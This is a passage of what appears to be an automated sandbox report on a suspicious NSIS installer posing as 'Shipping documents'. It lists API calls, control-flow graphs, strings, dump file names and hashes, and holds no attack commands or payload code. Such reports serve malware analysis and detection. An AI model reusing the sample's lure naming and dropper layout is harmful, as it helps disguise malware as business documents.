                                        • Part of subcall function 004068E6: GetModuleHandleA.KERNEL32(UXTHEME,Error writing temporary file. Make sure your temp folder is valid.,UXTHEME,00403810,0000000B), ref: 004068F4
                                        • Part of subcall function 004068E6: GetProcAddress.KERNEL32(00000000), ref: 00406910
                                      • lstrcatW.KERNEL32(1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000,00000002,00000000,75923420,00000000,75923170), ref: 00405AC1
                                      • lstrlenW.KERNEL32(Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000,00000002,00000000), ref: 00405B45
                                      • lstrcmpiW.KERNEL32(-000000FC,.exe,Exec,?,?,?,Exec,00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,1033,perchlorination: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,perchlorination: Installing,00000000), ref: 00405B5A
                                      • GetFileAttributesW.KERNEL32(Exec), ref: 00405B65
                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer), ref: 00405BAE
                                        • Part of subcall function 0040661F: wsprintfW.USER32 ref: 0040662C
                                      • RegisterClassW.USER32(004349A0), ref: 00405BF3
                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405C0A
                                      • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405C3F
                                      • ShowWindow.USER32(00000005,00000000), ref: 00405C71
                                      • GetClassInfoW.USER32(00000000,RichEdit20W,004349A0), ref: 00405C9C
                                      • GetClassInfoW.USER32(00000000,RichEdit,004349A0), ref: 00405CA9
                                      • RegisterClassW.USER32(004349A0), ref: 00405CB6
                                      • DialogBoxParamW.USER32(?,00000000,00404F92,00000000), ref: 00405CD1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Control Panel\Desktop\ResourceLocale$Exec$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$perchlorination: Installing
                                      • API String ID: 1975747703-1168572951
                                      • Opcode ID: 3bc0d0cabe1863129078f0feabcaa81f7bf88df128255f6ebf80579141351188
                                      • Instruction ID: 6fb6b78dff8dcbba7a007941f02a836e4a1cfbcf653c0408c2f56a309db5e394
                                      • Opcode Fuzzy Hash: 3bc0d0cabe1863129078f0feabcaa81f7bf88df128255f6ebf80579141351188
                                      • Instruction Fuzzy Hash: 7061E4B1201605BEE610AB75AD45F7B36ACEF80358F50453BF901B61E2DB79AC108F6D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 516 40154a-4015bd 517 402ea1 516->517 518 4015c3-4015c7 516->518 519 402ea5 517->519 520 4016c1-4016cf 518->520 521 4017c2-401e9e call 40303e call 4065cf 518->521 522 401684-4016aa 518->522 523 4015e6-4015ee 518->523 524 4018cb-4018d4 call 40303e call 406a56 518->524 525 40160c-40160d 518->525 526 4015ce-4015d0 518->526 527 4016ef-4016fb call 40303e SetFileAttributesW 518->527 528 4016af-4016bc call 40661f 518->528 529 40182f-40184b call 40303e GetFullPathNameW 518->529 530 401711-401728 call 40303e call 406bc5 518->530 531 401633-40163a SetForegroundWindow 518->531 532 4017d3-4017f6 call 40303e * 3 MoveFileW 518->532 533 4015d5-4015d6 518->533 534 401618-40162e call 403002 Sleep 518->534 535 4015f9-401607 call 4030fd call 401399 518->535 536 40189b-4018b8 call 40303e SearchPathW 518->536 537 4018de-401904 call 40303e call 406e03 518->537 538 40163f-401645 518->538 539 402eab 519->539 554 4016d1-4016d5 ShowWindow 520->554 555 4016d9-4016e0 520->555 609 401bb2-401bb6 521->609 610 401ea4-401ea8 521->610 551 402ead-402eb7 522->551 558 4015f0-4015f7 PostQuitMessage 523->558 559 4015dc-4015e1 523->559 593 4018d9 524->593 544 40160e-401613 call 405d3a 525->544 526->551 587 401701-401703 527->587 528->517 585 401857-40185d 529->585 586 40184d-401855 529->586 601 401784-40178e 530->601 602 40172a-40173f call 4065f6 530->602 531->517 617 401804-401808 532->617 618 4017f8-4017ff 532->618 556 4015d7 call 405d3a 533->556 534->517 535->551 536->517 579 4018be-4018c6 536->579 604 401906-40190c call 406b1a 537->604 605 40190e-401920 call 406b1a call 406556 lstrcatW 537->605 549 401671-40167f 538->549 550 401647 538->550 539->551 544->517 549->517 569 401657-40166c call 403002 550->569 570 401649-401650 550->570 554->555 555->517 573 4016e6-4016ea ShowWindow 555->573 556->559 558->559 559->551 569->517 570->569 573->517 579->519 597 40187b 585->597 598 40185f-401862 585->598 596 40187f-401883 586->596 587->517 588 401709-40170c 587->588 588->519 593->587 596->519 599 401889-401896 GetShortPathNameW 596->599 597->596 598->597 606 401864-40186c call 4065cf 598->606 599->519 613 401790-4017ab call 405d3a call 406b1a SetCurrentDirectoryW 601->613 614 4017bb-4017bd 601->614 623 401741-401745 602->623 624 401758-401759 call 405e1e 602->624 626 401925-40192d call 406d3d 604->626 605->626 606->586 629 40186e-401876 call 406b1a 606->629 609->551 610->517 610->551 613->517 647 4017b1-4017b6 613->647 614->544 617->588 625 40180e-401816 call 4065cf 617->625 618->544 623->624 630 401747-40174e call 4064fc 623->630 639 40175e-401760 624->639 625->588 643 40181c-40182a call 40623d 625->643 646 40192e-401931 626->646 629->597 630->624 648 401750-401751 call 405e3e 630->648 644 401762-401767 639->644 645 401775-40177e 639->645 643->544 650 401774 644->650 651 401769-401772 GetFileAttributesW 644->651 645->602 652 401780 645->652 653 401933-40193d call 4065cf 646->653 654 401964-401966 646->654 647->517 662 401756 648->662 650->645 651->645 651->650 652->601 665 401950-401960 653->665 666 40193f-40194e CompareFileTime 653->666 655 401968-401969 call 406b9d 654->655 656 40196e-401989 call 40691b 654->656 655->656 667 401a18-401a49 call 405d3a call 403148 656->667 668 40198f-401991 656->668 662->639 665->654 666->665 681 401a52-401a5a SetFileTime 667->681 682 401a4b-401a50 667->682 669 401993-4019df call 406b1a * 2 call 405eba call 406b1a call 406aa8 668->669 670 4019fd-401a13 call 405d3a 668->670 669->646 699 4019e5-4019e8 669->699 670->519 683 401a60-401a6d CloseHandle 681->683 682->681 682->683 683->517 685 401a73-401a76 683->685 687 401a78-401a87 call 405eba lstrcatW 685->687 688 401a89-401a8c call 405eba 685->688 694 401a91-401a9c call 406aa8 687->694 688->694 694->559 700 4019f2-4019f8 699->700 701 4019ea-4019ed 699->701 700->539 701->556
                                      APIs
                                      • PostQuitMessage.USER32(00000000), ref: 004015F1
                                      • Sleep.KERNEL32(00000001,?,00000000,00000000), ref: 00401628
                                      • SetForegroundWindow.USER32 ref: 00401634
                                      • ShowWindow.USER32(?,00000000,?,?,00000000,00000000), ref: 004016D3
                                      • ShowWindow.USER32(?,?,?,?,00000000,00000000), ref: 004016E8
                                      • SetFileAttributesW.KERNEL32(00000000,?,000000F0,?,?,00000000,00000000), ref: 004016FB
                                      • GetFileAttributesW.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0,?,?,00000000,00000000), ref: 0040176A
                                      • SetCurrentDirectoryW.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,000000E6,C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 004017A3
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 004017EE
                                      • GetFullPathNameW.KERNEL32(00000000,00000400,00000000,?,00000000,000000E3,C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,00000000,00000000), ref: 00401843
                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00000400), ref: 00401890
                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00000400,00000000,?,000000FF,?,?,00000000,00000000), ref: 004018B0
                                      • lstrcatW.KERNEL32(00000000,00000000,Exec,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,00000000,00000031,00000000,00000000,000000EF,?,?,00000000,00000000), ref: 00401920
                                      • CompareFileTime.KERNEL32(-00000014,00000000,Exec,Exec,00000000,00000000,Exec,C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer,00000000,00000000,00000031,00000000,00000000,000000EF), ref: 00401948
                                      • SetFileTime.KERNELBASE(00000000,000000FF,00000000,000000FF,?,00000000,00000000,00000000,000000EA,00000000,Exec,40000000,00000001,Exec,00000000), ref: 00401A5A
                                      • CloseHandle.KERNELBASE(00000000), ref: 00401A61
                                      • lstrcatW.KERNEL32(Exec,00000000,Exec,000000E9), ref: 00401A82
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$PathWindow$AttributesNameShowTimelstrcat$CloseCompareCurrentDirectoryForegroundFullHandleMessageMovePostQuitSearchShortSleep
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer$Exec
                                      • API String ID: 3895412863-2909577899
                                      • Opcode ID: 908e177244b311fa2ecad2bc2786d6a07ecd1f04af5a848f628353bc50e42be3
                                      • Instruction ID: 8c1cf908ae02b995a3a41f7ffac76b054db7533a66b8d62ade7f549c41348504
                                      • Opcode Fuzzy Hash: 908e177244b311fa2ecad2bc2786d6a07ecd1f04af5a848f628353bc50e42be3
                                      • Instruction Fuzzy Hash: 38D10870604301BBD710AF26CD85E2B76A8EF85359F204A3FF452B62E1D77CD9019A6E

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 702 4033ed-40343a GetTickCount GetModuleFileNameW call 40691b 705 403446-403476 call 406b1a call 406d10 call 406b1a GetFileSize 702->705 706 40343c-403441 702->706 714 403572-403581 call 403389 705->714 715 40347c 705->715 707 403645-40364c 706->707 720 403640 714->720 721 403587-403589 714->721 716 403480-4034a6 call 40311b 715->716 725 403638-40363f call 403389 716->725 726 4034ac-4034b3 716->726 720->707 723 4035ba-4035ea GlobalAlloc call 403131 call 403148 721->723 724 40358b-4035aa call 403131 call 406948 721->724 723->720 752 4035ec-4035fe 723->752 724->720 750 4035b0-4035b4 724->750 725->720 730 403534-403537 726->730 731 4034b5-4034ce call 4066b4 726->731 733 403541-403547 730->733 734 403539-403540 call 403389 730->734 731->733 748 4034d0-4034d8 731->748 740 403549-403558 call 406e3c 733->740 741 40355c-403564 733->741 734->733 740->741 741->716 749 40356a-40356e 741->749 748->733 753 4034da-4034e2 748->753 749->714 750->720 750->723 754 403600 752->754 755 403606-403609 752->755 753->733 756 4034e4-4034ec 753->756 754->755 757 40360c-403614 755->757 756->733 758 4034ee-4034f6 756->758 757->757 760 403616-40362f SetFilePointer call 4066b4 757->760 758->733 759 4034f8-403517 758->759 759->720 761 40351d-403523 759->761 764 403634-403636 760->764 761->749 763 403525-40352e 761->763 763->733 765 403530-403532 763->765 764->707 765->733
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00403400
                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,00000400,?,?,?,?,?), ref: 0040341C
                                        • Part of subcall function 0040691B: GetFileAttributesW.KERNELBASE(00000003,0040342F,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 0040691F
                                        • Part of subcall function 0040691B: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000000,00000000,?,?,?,?,?), ref: 0040693F
                                      • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe,80000000,00000003,?,?,?,?,?), ref: 00403466
                                      • GlobalAlloc.KERNELBASE(00000040,?,?,?,?,?,?), ref: 004035C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                      • String ID: 8uA$C:\Users\user\Desktop$C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                      • API String ID: 2803837635-1108000592
                                      • Opcode ID: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
                                      • Instruction ID: 38a706e546d8de2da2def33f7086105d1948706aa1bd56b4a23ee49e5693a868
                                      • Opcode Fuzzy Hash: b1b98763bb0db303c7b3231907fd55efb5170903535a500b48b663575e7cf9bd
                                      • Instruction Fuzzy Hash: 0A51B171504310BFD720AF21DD81B1B7BA8AB4471AF10093FFA55B72E1C7789A848BAD

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 766 405eba-405ec3 767 405ec5-405ed4 766->767 768 405ed6-405ef1 766->768 767->768 769 405ef3-405efe 768->769 770 405f08-405f0f 768->770 769->770 771 405f00-405f04 769->771 772 406103-40610a 770->772 773 405f15-405f18 770->773 771->770 774 406115 772->774 775 40610c-406113 call 406b1a 772->775 776 405f19-405f27 773->776 778 406117-40611d 774->778 775->778 779 405f2d-405f38 776->779 780 4060fe-406102 776->780 782 4060d7 779->782 783 405f3e-405f82 779->783 780->772 786 4060e5 782->786 787 4060d9-4060e3 782->787 784 406082-406085 783->784 785 405f88-405f99 783->785 790 406087-40608a 784->790 791 4060bb-4060be 784->791 788 405fd9-405fdc 785->788 789 405f9b-405fc7 call 406977 785->789 792 4060e8 786->792 787->792 796 405fec-405fef 788->796 797 405fde-405fea GetSystemDirectoryW 788->797 809 405fcd-405fd4 call 405eba 789->809 810 40605e-406063 789->810 798 40609a-4060b1 call 406b1a 790->798 799 40608c-406098 call 40661f 790->799 794 4060c0-4060c4 call 405eba 791->794 795 4060c9-4060d5 lstrlenW 791->795 800 4060ea-4060f8 792->800 794->795 795->800 805 405ff1-405ffd GetWindowsDirectoryW 796->805 806 405fff-406007 796->806 804 40605a 797->804 798->795 814 4060b3-4060b9 call 406d3d 798->814 799->795 800->776 800->780 804->810 805->804 811 406009-406012 806->811 812 40601e-406034 806->812 809->810 816 406065-406068 810->816 817 406076-406080 call 406d3d 810->817 823 40601a-40601c 811->823 824 406051-406058 812->824 825 406036-40604f SHGetPathFromIDListW CoTaskMemFree 812->825 814->795 816->817 821 40606a-406070 lstrcatW 816->821 817->795 821->817 823->804 823->812 824->804 824->806 825->804 825->824
                                      APIs
                                      • GetSystemDirectoryW.KERNEL32(Exec,00000400), ref: 00405FE4
                                        • Part of subcall function 00406B1A: lstrcpynW.KERNEL32(?,?,00000400,00403871,00434A00,NSIS Error), ref: 00406B27
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DB2
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,?,?,00000000), ref: 00406DC1
                                        • Part of subcall function 00406D3D: CharNextW.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DC6
                                        • Part of subcall function 00406D3D: CharPrevW.USER32(?,?,Error writing temporary file. Make sure your temp folder is valid.,C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,00403CB1,C:\Users\user\AppData\Local\Temp\,75923420,004039C2), ref: 00406DDE
                                      • GetWindowsDirectoryW.KERNEL32(Exec,00000400,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,?,?,?,00000000,?,?), ref: 00405FF7
                                      • lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
                                      • lstrlenW.KERNEL32(Exec,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,?,?,?,00000000,?,?), ref: 004060CA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: Char$Next$Directory$PrevSystemWindowslstrcatlstrcpynlstrlen
                                      • String ID: Exec$Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                      • API String ID: 4187626192-2997835319
                                      • Opcode ID: 3c28ae1c7ce8c1b53528908d8ac53578659c627eaf9f04ce26a2ce276e9f7094
                                      • Instruction ID: 8c51b57b95ad5d2f56c6428f73255cfba4eda90222275d8884e674a65d57f274
                                      • Opcode Fuzzy Hash: 3c28ae1c7ce8c1b53528908d8ac53578659c627eaf9f04ce26a2ce276e9f7094
                                      • Instruction Fuzzy Hash: 05611471240216ABDB20AF248C40A7B76A5EF99314F12453FF942FB2D1D77CD9218B6D

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 892 405d3a-405d46 893 405e17-405e1b 892->893 894 405d4c-405d5f 892->894 895 405d61-405d66 call 405eba 894->895 896 405d6b-405d7b lstrlenW 894->896 895->896 898 405da0 896->898 899 405d7d-405d8c lstrlenW 896->899 902 405da5-405da8 898->902 900 405d92-405d9e lstrcatW 899->900 901 405e14-405e16 899->901 900->902 901->893 903 405db7-405dba 902->903 904 405daa-405db1 SetWindowTextW 902->904 905 405e02-405e04 903->905 906 405dbc-405e00 SendMessageW * 3 903->906 904->903 905->901 907 405e06-405e0c 905->907 906->905 907->901
                                      APIs
                                      • lstrlenW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D6C
                                      • lstrlenW.KERNEL32(?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D7E
                                      • lstrcatW.KERNEL32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,?,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,?,00000000,?,?), ref: 00405D99
                                      • SetWindowTextW.USER32(Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll,Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll), ref: 00405DB1
                                      • SendMessageW.USER32(?), ref: 00405DD8
                                      • SendMessageW.USER32(?,0000104D,00000000,?), ref: 00405DF3
                                      • SendMessageW.USER32(?,00001013,00000000,00000000), ref: 00405E00
                                        • Part of subcall function 00405EBA: lstrcatW.KERNEL32(Exec,\Microsoft\Internet Explorer\Quick Launch,?,?,?,?,?,?,?,?,?,?,?,?,004032C0,00000000), ref: 00406070
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2069428937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.2069402946.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069486282.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.0000000000494000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004A6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_Shipping documents 000309498585956000797900.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$TextWindow
                                      • String ID: Extract: C:\Users\user\AppData\Local\Temp\nsq1A4F.tmp\nsExec.dll
                                      • API String ID: 1759915248-3666549865
                                      • Opcode ID: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
                                      • Instruction ID: 65e3057419f119a88936ccc655a9da3a15af0d16a1f773064a71e2051a7db8da
                                      • Opcode Fuzzy Hash: ceb28205faf147af3908885d1a7d22d6de82ef9b87b173db114e6d635282a543
                                      • Instruction Fuzzy Hash: D121C2B2A056206BD310AB59DC44AABBBDCEF94710F45043FB984A3291C7B89D404AED

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 908 403148-403181 909 403190-4031a4 call 406948 908->909 910 403183-40318b call 403131 908->910 914 403379 909->914 915 4031aa-4031b0 909->915 910->909 918 40337b 914->918 916 4031b6-403202 GetTickCount 915->916 917 40331b-40331d 915->917 919 403313-403315 916->919 920 403208-40321f call 40311b 916->920 921 403362-403377 call 40311b 917->921 922 40331f-403321 917->922 923 40337c-403386 918->923 919->923 920->914 930 403225-403233 920->930 921->914 921->919 922->919 926 403323 922->926 929 403328-403338 call 40311b 926->929 929->914 934 40333a-40334a call 406a0b 929->934 933 40323d-403259 call 40728e 930->933 939 403317-403319 933->939 940 40325f-40327f GetTickCount 933->940 941 40334c-40335a 934->941 942 40335e-403360 934->942 939->918 943 403281-40328a 940->943 944 4032cc-4032d2 940->944 941->929 947 40335c 941->947 942->918 948 403290-4032c8 MulDiv wsprintfW call 405d3a 943->948 949 40328c-40328e 943->949 945 4032d4-4032d6 944->945 946 40330b-40330d 944->946 950 4032f0-4032f8 945->950 951 4032d8-4032e1 call 406a0b 945->951 946->919 946->920 947->919 948->944 949->944 949->948 954 4032fc-403303 950->954 956 4032e6-4032e8 951->956 954->933 957 403309 954->957 956->942 958 4032ea-4032ee 956->958 957->919 958->954
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004031B6
                                      • GetTickCount.KERNEL32 ref: 0040326A
